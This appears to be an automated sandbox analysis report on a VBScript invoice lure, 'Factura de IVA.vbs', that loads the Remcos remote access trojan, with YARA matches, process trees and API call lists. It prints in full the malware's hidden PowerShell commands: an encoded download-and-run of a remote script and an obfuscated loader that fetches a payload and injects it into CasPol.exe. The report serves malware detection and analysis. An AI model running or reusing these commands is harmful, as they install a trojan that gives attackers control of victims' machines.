Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043E1E0 16_2_0043E1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041E29B 16_2_0041E29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004373DA 16_2_004373DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00438380 16_2_00438380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00453472 16_2_00453472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0042747E 16_2_0042747E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043E43D 16_2_0043E43D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004325A1 16_2_004325A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043774C 16_2_0043774C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041F809 16_2_0041F809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004379F6 16_2_004379F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004279F5 16_2_004279F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0044DAD9 16_2_0044DAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00433C73 16_2_00433C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00413CA0 16_2_00413CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00437CBD 16_2_00437CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043DD82 16_2_0043DD82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00435F52 16_2_00435F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00437F78 16_2_00437F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043DFB1 16_2_0043DFB1
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00402117 appears 41 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Factura de IVA.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6723
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6723 Jump to behavior
Yara signature match
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@19/11@4/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 16_2_00417AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 16_2_0040C03C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource, 16_2_0041B9AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0041AC43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GthhFfutuyhw.js Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3976:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\RmcuIYHgvtuvuyVTvuyviiywVKYV*ytvUIYVIAYVIYVIY-UEDFV8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2dptai5.rwf.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura de IVA.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Factura de IVA.vbs ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura de IVA.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\GthhFfutuyhw.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\microsiphonula.js"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\microsiphonula.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== " Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\GthhFfutuyhw.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNys